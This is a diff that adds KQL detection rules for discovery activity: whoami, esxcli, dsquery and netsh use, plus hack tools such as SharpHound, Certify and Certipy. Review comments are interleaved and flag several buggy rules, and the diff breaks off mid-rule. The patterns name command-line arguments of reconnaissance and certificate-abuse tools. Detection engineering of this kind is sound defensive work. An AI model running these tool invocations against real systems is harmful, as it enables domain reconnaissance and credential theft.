+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2023-06-02
+// Level: low
+// Description: Detects usage of crontab to list the tasks of the user
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1007
+// False Positives:
+// - Legitimate use of crontab
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " -l" and FolderPath endswith "/crontab"
\ No newline at end of file
diff --git a/KQL/rules/Discovery/detected_windows_software_discovery.kql b/KQL/rules/Discovery/detected_windows_software_discovery.kql
new file mode 100644
index 00000000..5b796643
--- /dev/null
+++ b/KQL/rules/Discovery/detected_windows_software_discovery.kql
@@ -0,0 +1,12 @@
+// Title: Detected Windows Software Discovery
+// Author: Nikita Nazarov, oscd.community
+// Date: 2020-10-16
+// Level: medium
+// Description: Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1518
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "query" and ProcessCommandLine contains "\\software\\" and ProcessCommandLine contains "/v" and ProcessCommandLine contains "svcversion") and FolderPath endswith "\\reg.exe"
\ No newline at end of file
diff --git a/KQL/rules/Discovery/dirlister_execution.kql b/KQL/rules/Discovery/dirlister_execution.kql
new file mode 100644
index 00000000..db43c8f5
--- /dev/null
+++ b/KQL/rules/Discovery/dirlister_execution.kql
@@ -0,0 +1,12 @@
+// Title: DirLister Execution
+// Author: frack113
+// Date: 2022-08-20
+// Level: low
+// Description: Detect the usage of "DirLister.exe" a utility for quickly listing folder or drive contents. It was seen used by BlackCat ransomware to create a list of accessible directories and files.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1083
+// False Positives:
+// - Legitimate use by users
+
+DeviceProcessEvents
+| where ProcessVersionInfoOriginalFileName =~ "DirLister.exe" or FolderPath endswith "\\dirlister.exe"
\ No newline at end of file
diff --git a/KQL/rules/Discovery/discovery_of_a_system_time.kql b/KQL/rules/Discovery/discovery_of_a_system_time.kql
new file mode 100644
index 00000000..f7f0f43d
--- /dev/null
+++ b/KQL/rules/Discovery/discovery_of_a_system_time.kql
@@ -0,0 +1,12 @@
+// Title: Discovery of a System Time
+// Author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community
+// Date: 2019-10-24
+// Level: low
+// Description: Identifies use of various commands to query a systems time. This technique may be used before executing a scheduled task or to discover the time zone of a target system.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1124
+// False Positives:
+// - Legitimate use of the system utilities to discover system time for legitimate reason
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "time" and (FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe")) or (ProcessCommandLine contains "tz" and FolderPath endswith "\\w32tm.exe")
\ No newline at end of file
diff --git a/KQL/rules/Discovery/docker_container_discovery_via_dockerenv_listing.kql b/KQL/rules/Discovery/docker_container_discovery_via_dockerenv_listing.kql
new file mode 100644
index 00000000..7b0c1a73
--- /dev/null
+++ b/KQL/rules/Discovery/docker_container_discovery_via_dockerenv_listing.kql
@@ -0,0 +1,13 @@
+// Title: Docker Container Discovery Via Dockerenv Listing
+// Author: Seth Hanford
+// Date: 2023-08-23
+// Level: low
+// Description: Detects listing or file reading of ".dockerenv" which can be a sing of potential container discovery
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1082
+// False Positives:
+// - Legitimate system administrator usage of these commands
+// - Some container tools or deployments may use these techniques natively to determine how they proceed with execution, and will need to be filtered
+
+DeviceProcessEvents
+| where ProcessCommandLine endswith ".dockerenv" and (FolderPath endswith "/cat" or FolderPath endswith "/dir" or FolderPath endswith "/find" or FolderPath endswith "/ls" or FolderPath endswith "/stat" or FolderPath endswith "/test" or FolderPath endswith "grep")
\ No newline at end of file
diff --git a/KQL/rules/Discovery/domain_trust_discovery_via_dsquery.kql b/KQL/rules/Discovery/domain_trust_discovery_via_dsquery.kql
new file mode 100644
index 00000000..ca6a57b8
--- /dev/null
+++ b/KQL/rules/Discovery/domain_trust_discovery_via_dsquery.kql
@@ -0,0 +1,12 @@
+// Title: Domain Trust Discovery Via Dsquery
+// Author: E.M. Anhaus, Tony Lambert, oscd.community, omkar72
+// Date: 2019-10-24
+// Level: medium
+// Description: Detects execution of "dsquery.exe" for domain trust discovery
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1482
+// False Positives:
+// - Legitimate use of the utilities by legitimate user for legitimate reason
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "trustedDomain" and (FolderPath endswith "\\dsquery.exe" or ProcessVersionInfoOriginalFileName =~ "dsquery.exe")
\ No newline at end of file
diff --git a/KQL/rules/Discovery/driverquery_exe_execution.kql b/KQL/rules/Discovery/driverquery_exe_execution.kql
new file mode 100644
index 00000000..7b80e2e6
--- /dev/null
+++ b/KQL/rules/Discovery/driverquery_exe_execution.kql
@@ -0,0 +1,12 @@
+// Title: DriverQuery.EXE Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-19
+// Level: medium
+// Description: Detect usage of the "driverquery" utility. Which can be used to perform reconnaissance on installed drivers
+// MITRE Tactic: Discovery
+// Tags: attack.discovery
+// False Positives:
+// - Legitimate use by third party tools in order to investigate installed drivers
+
+DeviceProcessEvents
+| where (FolderPath endswith "driverquery.exe" or ProcessVersionInfoOriginalFileName =~ "drvqry.exe") and (not(((InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe") or (InitiatingProcessFolderPath contains "\\AppData\\Local\\" or InitiatingProcessFolderPath contains "\\Users\\Public\\" or InitiatingProcessFolderPath contains "\\Windows\\Temp\\"))))
\ No newline at end of file
diff --git a/KQL/rules/Discovery/enumerate_all_information_with_whoami_exe.kql b/KQL/rules/Discovery/enumerate_all_information_with_whoami_exe.kql
new file mode 100644
index 00000000..c1fbed8e
--- /dev/null
+++ b/KQL/rules/Discovery/enumerate_all_information_with_whoami_exe.kql
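Review bot: `FolderPath endswith "driverquery.exe"` is the only image test in this batch written without the leading backslash, so any binary whose name merely ends in that string (e.g. `notdriverquery.exe`) satisfies it; `FolderPath endswith "\\driverquery.exe"` matches the convention the neighbouring rules follow. The `not(...)` block also deserves a comment, because on first read it looks inverted — it drops exactly the script-host and user-writable-directory parents that are the most suspicious, presumably because those are meant to be caught by a separate, higher-severity suspicious-parent rule. Something like `// Script-host and AppData/Public/Temp parents are deliberately excluded here; they are covered by the dedicated suspicious-parent driverquery rule` would save the next reader that detour, and if that companion rule has not been ported the exclusion should be dropped rather than silently losing the strongest signal.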
@@ -0,0 +1,10 @@
+// Title: Enumerate All Information With Whoami.EXE
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-12-04
+// Level: medium
+// Description: Detects the execution of "whoami.exe" with the "/all" flag
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1033, car.2016-03-001
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -all" or ProcessCommandLine contains " /all" or ProcessCommandLine contains " –all" or ProcessCommandLine contains " —all" or ProcessCommandLine contains " ―all") and (FolderPath endswith "\\whoami.exe" or ProcessVersionInfoOriginalFileName =~ "whoami.exe")
\ No newline at end of file
diff --git a/KQL/rules/Discovery/esxi_network_configuration_discovery_via_esxcli.kql b/KQL/rules/Discovery/esxi_network_configuration_discovery_via_esxcli.kql
new file mode 100644
index 00000000..7ad955ff
--- /dev/null
+++ b/KQL/rules/Discovery/esxi_network_configuration_discovery_via_esxcli.kql
@@ -0,0 +1,12 @@
+// Title: ESXi Network Configuration Discovery Via ESXCLI
+// Author: Cedric Maurugeon
+// Date: 2023-09-04
+// Level: medium
+// Description: Detects execution of the "esxcli" command with the "network" flag in order to retrieve information about the network configuration.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.execution, attack.t1033, attack.t1007, attack.t1059.012
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " get" or ProcessCommandLine contains " list") and (ProcessCommandLine contains "network" and FolderPath endswith "/esxcli")
\ No newline at end of file
diff --git a/KQL/rules/Discovery/esxi_storage_information_discovery_via_esxcli.kql b/KQL/rules/Discovery/esxi_storage_information_discovery_via_esxcli.kql
new file mode 100644
index 00000000..0a0a16b8
--- /dev/null
+++ b/KQL/rules/Discovery/esxi_storage_information_discovery_via_esxcli.kql
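Review bot: This and the other esxcli rules query DeviceProcessEvents, but as far as I know ESXi hosts cannot be onboarded to MDE, so the only events these can ever see are `esxcli` invocations from an onboarded Linux box that carries the vSphere CLI (typically remote `esxcli --server ...` use) — a much narrower signal than the upstream rule implies. That is worth stating in the header so nobody assumes hypervisor coverage: `// NOTE: ESXi itself has no MDE sensor; this only fires for esxcli run from an onboarded Linux host (e.g. vSphere CLI / remote --server invocations).` Separately, `ProcessCommandLine contains "network"` also matches the substring inside an unrelated argument such as a `--server mynetwork01` hostname; `ProcessCommandLine has "network"` restricts it to the namespace token.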
@@ -0,0 +1,12 @@ +// Title: ESXi Storage Information Discovery Via ESXCLI +// Author: Nasreddine Bencherchali (Nextron Systems), Cedric Maurugeon +// Date: 2023-09-04 +// Level: medium +// Description: Detects execution of the "esxcli" command with the "storage" flag in order to retrieve information about the storage status and other related information. Seen used by malware such as DarkSide and LockBit. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.execution, attack.t1033, attack.t1007, attack.t1059.012 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents +| where (ProcessCommandLine contains " get" or ProcessCommandLine contains " list") and (ProcessCommandLine contains "storage" and FolderPath endswith "/esxcli") \ No newline at end of file diff --git a/KQL/rules/Discovery/esxi_system_information_discovery_via_esxcli.kql b/KQL/rules/Discovery/esxi_system_information_discovery_via_esxcli.kql new file mode 100644 index 00000000..c1e30e5f --- /dev/null +++ b/KQL/rules/Discovery/esxi_system_information_discovery_via_esxcli.kql @@ -0,0 +1,12 @@ +// Title: ESXi System Information Discovery Via ESXCLI +// Author: Cedric Maurugeon +// Date: 2023-09-04 +// Level: medium +// Description: Detects execution of the "esxcli" command with the "system" flag in order to retrieve information about the different component of the system. Such as accounts, modules, NTP, etc. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.execution, attack.t1033, attack.t1007, attack.t1059.012 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents +| where (ProcessCommandLine contains " get" or ProcessCommandLine contains " list") and (ProcessCommandLine contains "system" and FolderPath endswith "/esxcli") \ No newline at end of file 
diff --git a/KQL/rules/Discovery/esxi_vm_list_discovery_via_esxcli.kql b/KQL/rules/Discovery/esxi_vm_list_discovery_via_esxcli.kql new file mode 100644 index 00000000..b5c6d21d --- /dev/null +++ b/KQL/rules/Discovery/esxi_vm_list_discovery_via_esxcli.kql @@ -0,0 +1,12 @@ +// Title: ESXi VM List Discovery Via ESXCLI +// Author: Cedric Maurugeon +// Date: 2023-09-04 +// Level: medium +// Description: Detects execution of the "esxcli" command with the "vm" flag in order to retrieve information about the installed VMs. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.execution, attack.t1033, attack.t1007, attack.t1059.012 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents +| where ProcessCommandLine contains "vm process" and ProcessCommandLine endswith " list" and FolderPath endswith "/esxcli" \ No newline at end of file diff --git a/KQL/rules/Discovery/esxi_vsan_information_discovery_via_esxcli.kql b/KQL/rules/Discovery/esxi_vsan_information_discovery_via_esxcli.kql new file mode 100644 index 00000000..6c395381 --- /dev/null +++ b/KQL/rules/Discovery/esxi_vsan_information_discovery_via_esxcli.kql @@ -0,0 +1,12 @@ +// Title: ESXi VSAN Information Discovery Via ESXCLI +// Author: Nasreddine Bencherchali (Nextron Systems), Cedric Maurugeon +// Date: 2023-09-04 +// Level: medium +// Description: Detects execution of the "esxcli" command with the "vsan" flag in order to retrieve information about virtual storage. Seen used by malware such as DarkSide. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.execution, attack.t1033, attack.t1007, attack.t1059.012 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents +| where (ProcessCommandLine contains " get" or ProcessCommandLine contains " list") and (ProcessCommandLine contains "vsan" and FolderPath endswith "/esxcli") \ No newline at end of file 
diff --git a/KQL/rules/Discovery/file_and_directory_discovery_linux.kql b/KQL/rules/Discovery/file_and_directory_discovery_linux.kql
new file mode 100644
index 00000000..b0ad098f
--- /dev/null
+++ b/KQL/rules/Discovery/file_and_directory_discovery_linux.kql
@@ -0,0 +1,13 @@
+// Title: File and Directory Discovery - Linux
+// Author: Daniil Yugoslavskiy, oscd.community, CheraghiMilad
+// Date: 2020-10-19
+// Level: informational
+// Description: Detects usage of system utilities such as "find", "tree", "findmnt", etc, to discover files, directories and network shares.
+
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1083
+// False Positives:
+// - Legitimate activities
+
+DeviceProcessEvents
+| where (ProcessCommandLine matches regex "(.){200,}" and FolderPath endswith "/file") or FolderPath endswith "/find" or FolderPath endswith "/findmnt" or FolderPath endswith "/mlocate" or (ProcessCommandLine contains "-R" and FolderPath endswith "/ls") or FolderPath endswith "/tree"
\ No newline at end of file
diff --git a/KQL/rules/Discovery/file_and_directory_discovery_macos.kql b/KQL/rules/Discovery/file_and_directory_discovery_macos.kql
new file mode 100644
index 00000000..86fe2a14
--- /dev/null
+++ b/KQL/rules/Discovery/file_and_directory_discovery_macos.kql
@@ -0,0 +1,12 @@
+// Title: File and Directory Discovery - MacOS
+// Author: Daniil Yugoslavskiy, oscd.community
+// Date: 2020-10-19
+// Level: informational
+// Description: Detects usage of system utilities to discover files and directories
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1083
+// False Positives:
+// - Legitimate activities
+
+DeviceProcessEvents
+| where (ProcessCommandLine matches regex "(.){200,}" and FolderPath =~ "/usr/bin/file") or FolderPath =~ "/usr/bin/find" or FolderPath =~ "/usr/bin/mdfind" or (ProcessCommandLine contains "-R" and FolderPath =~ "/bin/ls") or FolderPath =~ "/tree"
\ No newline at end of file
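Review bot: In the macOS hunk, `FolderPath =~ "/tree"` is an exact (case-insensitive) equality and therefore only matches a binary sitting at the filesystem root, whereas the Linux hunk on the same line uses `FolderPath endswith "/tree"`; since `tree` is normally installed under a bin directory, the macOS clause is dead and should also be `FolderPath endswith "/tree"`. Separately, `contains` is case-insensitive in KQL, so `ProcessCommandLine contains "-R"` in both rules fires on `ls -r` (reverse sort) as well as the recursive listing the rule is after; `ProcessCommandLine contains_cs "-R"` preserves the intent in both hunks.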
diff --git a/KQL/rules/Discovery/file_and_subfolder_enumeration_via_dir_command.kql b/KQL/rules/Discovery/file_and_subfolder_enumeration_via_dir_command.kql
new file mode 100644
index 00000000..f0558c42
--- /dev/null
+++ b/KQL/rules/Discovery/file_and_subfolder_enumeration_via_dir_command.kql
@@ -0,0 +1,13 @@
+// Title: File And SubFolder Enumeration Via Dir Command
+// Author: frack113
+// Date: 2021-12-13
+// Level: low
+// Description: Detects usage of the "dir" command part of Windows CMD with the "/S" command line flag in order to enumerate files in a specified directory and all subdirectories.
+
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1217
+// False Positives:
+// - Likely
+
+DeviceProcessEvents
+| where (ProcessCommandLine =~ "*dir*-s*" or ProcessCommandLine =~ "*dir*/s*" or ProcessCommandLine =~ "*dir*–s*" or ProcessCommandLine =~ "*dir*—s*" or ProcessCommandLine =~ "*dir*―s*") and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe")
\ No newline at end of file
diff --git a/KQL/rules/Discovery/file_explorer_folder_opened_using_explorer_folder_shortcut_via_shell.kql b/KQL/rules/Discovery/file_explorer_folder_opened_using_explorer_folder_shortcut_via_shell.kql
new file mode 100644
index 00000000..a5a3af68
--- /dev/null
+++ b/KQL/rules/Discovery/file_explorer_folder_opened_using_explorer_folder_shortcut_via_shell.kql
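Review bot: `=~` is case-insensitive string equality in KQL, not a glob, so each `ProcessCommandLine =~ "*dir*-s*"` clause compares the command line against a string containing literal asterisks and can never match; the dir-command rule is dead as written. One regex keeps the ordering the original wildcard expressed: `| where ProcessCommandLine matches regex @"(?i)dir.*[-/–—―]s" and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe")`. This looks like a converter artifact for values with interior wildcards, so other generated rules of the same shape are probably affected and the fix belongs in the conversion script as well as here.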
@@ -0,0 +1,11 @@ +// Title: File Explorer Folder Opened Using Explorer Folder Shortcut Via Shell +// Author: @Kostastsale +// Date: 2022-12-22 +// Level: high +// Description: Detects the initial execution of "cmd.exe" which spawns "explorer.exe" with the appropriate command line arguments for opening the "My Computer" folder. + +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1135 + +DeviceProcessEvents +| where ProcessCommandLine contains "shell:mycomputerfolder" and FolderPath endswith "\\explorer.exe" and (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") \ No newline at end of file diff --git a/KQL/rules/Discovery/firewall_configuration_discovery_via_netsh_exe.kql b/KQL/rules/Discovery/firewall_configuration_discovery_via_netsh_exe.kql new file mode 100644 index 00000000..5e764c85 --- /dev/null +++ b/KQL/rules/Discovery/firewall_configuration_discovery_via_netsh_exe.kql @@ -0,0 +1,12 @@ +// Title: Firewall Configuration Discovery Via Netsh.EXE +// Author: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io' +// Date: 2021-12-07 +// Level: low +// Description: Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1016 +// False Positives: +// - Administrative activity + +DeviceProcessEvents +| where ((ProcessCommandLine contains "config " or ProcessCommandLine contains "state " or ProcessCommandLine contains "rule " or ProcessCommandLine contains "name=all") and (ProcessCommandLine contains "netsh" and ProcessCommandLine contains "show " and ProcessCommandLine contains "firewall ")) and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe") \ No newline at end of file 
diff --git a/KQL/rules/Discovery/fsutil_drive_enumeration.kql b/KQL/rules/Discovery/fsutil_drive_enumeration.kql new file mode 100644 index 00000000..93fb63d7 --- /dev/null +++ b/KQL/rules/Discovery/fsutil_drive_enumeration.kql @@ -0,0 +1,12 @@ +// Title: Fsutil Drive Enumeration +// Author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io' +// Date: 2022-03-29 +// Level: low +// Description: Attackers may leverage fsutil to enumerated connected drives. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1120 +// False Positives: +// - Certain software or administrative tasks may trigger false positives. + +DeviceProcessEvents +| where ProcessCommandLine contains "drives" and (FolderPath endswith "\\fsutil.exe" or ProcessVersionInfoOriginalFileName =~ "fsutil.exe") \ No newline at end of file diff --git a/KQL/rules/Discovery/gathernetworkinfo_vbs_reconnaissance_script_output.kql b/KQL/rules/Discovery/gathernetworkinfo_vbs_reconnaissance_script_output.kql new file mode 100644 index 00000000..0e070409 --- /dev/null +++ b/KQL/rules/Discovery/gathernetworkinfo_vbs_reconnaissance_script_output.kql @@ -0,0 +1,10 @@ +// Title: GatherNetworkInfo.VBS Reconnaissance Script Output +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-02-08 +// Level: medium +// Description: Detects creation of files which are the results of executing the built-in reconnaissance script "C:\Windows\System32\gatherNetworkInfo.vbs". +// MITRE Tactic: Discovery +// Tags: attack.discovery + +DeviceFileEvents +| where (FolderPath endswith "\\Hotfixinfo.txt" or FolderPath endswith "\\netiostate.txt" or FolderPath endswith "\\sysportslog.txt" or FolderPath endswith "\\VmSwitchLog.evtx") and FolderPath startswith "C:\\Windows\\System32\\config" \ No newline at end of file diff --git a/KQL/rules/Discovery/gpresult_display_group_policy_information.kql b/KQL/rules/Discovery/gpresult_display_group_policy_information.kql new file mode 100644 index 00000000..24b11f4e 
--- /dev/null +++ b/KQL/rules/Discovery/gpresult_display_group_policy_information.kql @@ -0,0 +1,10 @@ +// Title: Gpresult Display Group Policy Information +// Author: frack113 +// Date: 2022-05-01 +// Level: medium +// Description: Detects cases in which a user uses the built-in Windows utility gpresult to display the Resultant Set of Policy (RSoP) information +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1615 + +DeviceProcessEvents +| where (ProcessCommandLine contains "/z" or ProcessCommandLine contains "/v") and FolderPath endswith "\\gpresult.exe" \ No newline at end of file diff --git a/KQL/rules/Discovery/group_membership_reconnaissance_via_whoami_exe.kql b/KQL/rules/Discovery/group_membership_reconnaissance_via_whoami_exe.kql new file mode 100644 index 00000000..c3ec9a4d --- /dev/null +++ b/KQL/rules/Discovery/group_membership_reconnaissance_via_whoami_exe.kql @@ -0,0 +1,10 @@ +// Title: Group Membership Reconnaissance Via Whoami.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-02-28 +// Level: medium +// Description: Detects the execution of whoami.exe with the /group command line flag to show group membership for the current user, account type, security identifiers (SID), and attributes. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1033 + +DeviceProcessEvents +| where (ProcessCommandLine contains " /groups" or ProcessCommandLine contains " -groups") and (FolderPath endswith "\\whoami.exe" or ProcessVersionInfoOriginalFileName =~ "whoami.exe") \ No newline at end of file diff --git a/KQL/rules/Discovery/hacktool_bloodhound_sharphound_execution.kql b/KQL/rules/Discovery/hacktool_bloodhound_sharphound_execution.kql new file mode 100644 index 00000000..986fc84f --- /dev/null +++ b/KQL/rules/Discovery/hacktool_bloodhound_sharphound_execution.kql 
@@ -0,0 +1,12 @@ +// Title: HackTool - Bloodhound/Sharphound Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2019-12-20 +// Level: high +// Description: Detects command line parameters used by Bloodhound and Sharphound hack tools +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1087.001, attack.t1087.002, attack.t1482, attack.t1069.001, attack.t1069.002, attack.execution, attack.t1059.001 +// False Positives: +// - Other programs that use these command line option and accepts an 'All' parameter + +DeviceProcessEvents +| where (ProcessCommandLine contains " -CollectionMethod All " or ProcessCommandLine contains " --CollectionMethods Session " or ProcessCommandLine contains " --Loop --Loopduration " or ProcessCommandLine contains " --PortScanTimeout " or ProcessCommandLine contains ".exe -c All -d " or ProcessCommandLine contains "Invoke-Bloodhound" or ProcessCommandLine contains "Get-BloodHoundData") or (ProcessCommandLine contains " -JsonFolder " and ProcessCommandLine contains " -ZipFileName ") or (ProcessCommandLine contains " DCOnly " and ProcessCommandLine contains " --NoSaveCache ") or (ProcessVersionInfoProductName contains "SharpHound" or ProcessVersionInfoFileDescription contains "SharpHound" or (ProcessVersionInfoCompanyName contains "SpecterOps" or ProcessVersionInfoCompanyName contains "evil corp") or (FolderPath contains "\\Bloodhound.exe" or FolderPath contains "\\SharpHound.exe")) \ No newline at end of file diff --git a/KQL/rules/Discovery/hacktool_certify_execution.kql b/KQL/rules/Discovery/hacktool_certify_execution.kql new file mode 100644 index 00000000..86ad786b --- /dev/null +++ b/KQL/rules/Discovery/hacktool_certify_execution.kql 
@@ -0,0 +1,10 @@ +// Title: HackTool - Certify Execution +// Author: pH-T (Nextron Systems) +// Date: 2023-04-17 +// Level: high +// Description: Detects Certify a tool for Active Directory certificate abuse based on PE metadata characteristics and common command line arguments. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.credential-access, attack.t1649 + +DeviceProcessEvents +| where (FolderPath endswith "\\Certify.exe" or ProcessVersionInfoOriginalFileName =~ "Certify.exe" or ProcessVersionInfoFileDescription contains "Certify") or ((ProcessCommandLine contains ".exe cas " or ProcessCommandLine contains ".exe find " or ProcessCommandLine contains ".exe pkiobjects " or ProcessCommandLine contains ".exe request " or ProcessCommandLine contains ".exe download ") and (ProcessCommandLine contains " /vulnerable" or ProcessCommandLine contains " /template:" or ProcessCommandLine contains " /altname:" or ProcessCommandLine contains " /domain:" or ProcessCommandLine contains " /path:" or ProcessCommandLine contains " /ca:")) \ No newline at end of file diff --git a/KQL/rules/Discovery/hacktool_certipy_execution.kql b/KQL/rules/Discovery/hacktool_certipy_execution.kql new file mode 100644 index 00000000..91f88bca --- /dev/null +++ b/KQL/rules/Discovery/hacktool_certipy_execution.kql 
@@ -0,0 +1,13 @@ +// Title: HackTool - Certipy Execution +// Author: pH-T (Nextron Systems), Sittikorn Sangrattanapitak +// Date: 2023-04-17 +// Level: high +// Description: Detects Certipy execution, a tool for Active Directory Certificate Services enumeration and abuse based on PE metadata characteristics and common command line arguments. + +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.credential-access, attack.t1649 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (FolderPath endswith "\\Certipy.exe" or ProcessVersionInfoOriginalFileName =~ "Certipy.exe" or ProcessVersionInfoFileDescription contains "Certipy") or ((ProcessCommandLine contains " account " or ProcessCommandLine contains " auth " or ProcessCommandLine contains " cert " or ProcessCommandLine contains " find " or ProcessCommandLine contains " forge " or ProcessCommandLine contains " ptt " or ProcessCommandLine contains " relay " or ProcessCommandLine contains " req " or ProcessCommandLine contains " shadow " or ProcessCommandLine contains " template ") and (ProcessCommandLine contains " -bloodhound" or ProcessCommandLine contains " -ca-pfx " or ProcessCommandLine contains " -dc-ip " or ProcessCommandLine contains " -kirbi" or ProcessCommandLine contains " -old-bloodhound" or ProcessCommandLine contains " -pfx " or ProcessCommandLine contains " -target" or ProcessCommandLine contains " -template" or ProcessCommandLine contains " -username " or ProcessCommandLine contains " -vulnerable" or ProcessCommandLine contains "auth -pfx" or ProcessCommandLine contains "shadow auto" or ProcessCommandLine contains "shadow list")) \ No newline at end of file diff --git a/KQL/rules/Discovery/hacktool_sharpldapmonitor_execution.kql b/KQL/rules/Discovery/hacktool_sharpldapmonitor_execution.kql new file mode 100644 index 00000000..426d1dbd --- /dev/null +++ b/KQL/rules/Discovery/hacktool_sharpldapmonitor_execution.kql 
@@ -0,0 +1,10 @@ +// Title: HackTool - SharpLDAPmonitor Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-12-30 +// Level: medium +// Description: Detects execution of the SharpLDAPmonitor. Which can monitor the creation, deletion and changes to LDAP objects. +// MITRE Tactic: Discovery +// Tags: attack.discovery + +DeviceProcessEvents +| where (ProcessCommandLine contains "/user:" and ProcessCommandLine contains "/pass:" and ProcessCommandLine contains "/dcip:") or (FolderPath endswith "\\SharpLDAPmonitor.exe" or ProcessVersionInfoOriginalFileName =~ "SharpLDAPmonitor.exe") \ No newline at end of file diff --git a/KQL/rules/Discovery/hacktool_sharpldapwhoami_execution.kql b/KQL/rules/Discovery/hacktool_sharpldapwhoami_execution.kql new file mode 100644 index 00000000..692e24e8 --- /dev/null +++ b/KQL/rules/Discovery/hacktool_sharpldapwhoami_execution.kql @@ -0,0 +1,12 @@ +// Title: HackTool - SharpLdapWhoami Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2022-08-29 +// Level: high +// Description: Detects SharpLdapWhoami, a whoami alternative that queries the LDAP service on a domain controller +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1033, car.2016-03-001 +// False Positives: +// - Programs that use the same command line flags + +DeviceProcessEvents +| where (ProcessCommandLine endswith " /method:ntlm" or ProcessCommandLine endswith " /method:kerb" or ProcessCommandLine endswith " /method:nego" or ProcessCommandLine endswith " /m:nego" or ProcessCommandLine endswith " /m:ntlm" or ProcessCommandLine endswith " /m:kerb") or FolderPath endswith "\\SharpLdapWhoami.exe" or (ProcessVersionInfoOriginalFileName contains "SharpLdapWhoami" or ProcessVersionInfoProductName =~ "SharpLdapWhoami") \ No newline at end of file diff --git a/KQL/rules/Discovery/hacktool_sharpview_execution.kql b/KQL/rules/Discovery/hacktool_sharpview_execution.kql new file mode 100644 index 00000000..7e30744c --- /dev/null 
+++ b/KQL/rules/Discovery/hacktool_sharpview_execution.kql 
@@ -0,0 +1,10 @@ +// Title: HackTool - SharpView Execution +// Author: frack113 +// Date: 2021-12-10 +// Level: high +// Description: Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1049, attack.t1069.002, attack.t1482, attack.t1135, attack.t1033 + +DeviceProcessEvents +| where ProcessVersionInfoOriginalFileName =~ "SharpView.exe" or FolderPath endswith "\\SharpView.exe" or (ProcessCommandLine contains "Add-RemoteConnection" or ProcessCommandLine contains "Convert-ADName" or ProcessCommandLine contains "ConvertFrom-SID" or ProcessCommandLine contains "ConvertFrom-UACValue" or ProcessCommandLine contains "Convert-SidToName" or ProcessCommandLine contains "Export-PowerViewCSV" or ProcessCommandLine contains "Find-DomainObjectPropertyOutlier" or ProcessCommandLine contains "Find-DomainProcess" or ProcessCommandLine contains "Find-DomainShare" or ProcessCommandLine contains "Find-DomainUserEvent" or ProcessCommandLine contains "Find-DomainUserLocation" or ProcessCommandLine contains "Find-ForeignGroup" or ProcessCommandLine contains "Find-ForeignUser" or ProcessCommandLine contains "Find-GPOComputerAdmin" or ProcessCommandLine contains "Find-GPOLocation" or ProcessCommandLine contains "Find-Interesting" or ProcessCommandLine contains "Find-LocalAdminAccess" or ProcessCommandLine contains "Find-ManagedSecurityGroups" or ProcessCommandLine contains "Get-CachedRDPConnection" or ProcessCommandLine contains "Get-DFSshare" or ProcessCommandLine contains "Get-DomainComputer" or ProcessCommandLine contains "Get-DomainController" or 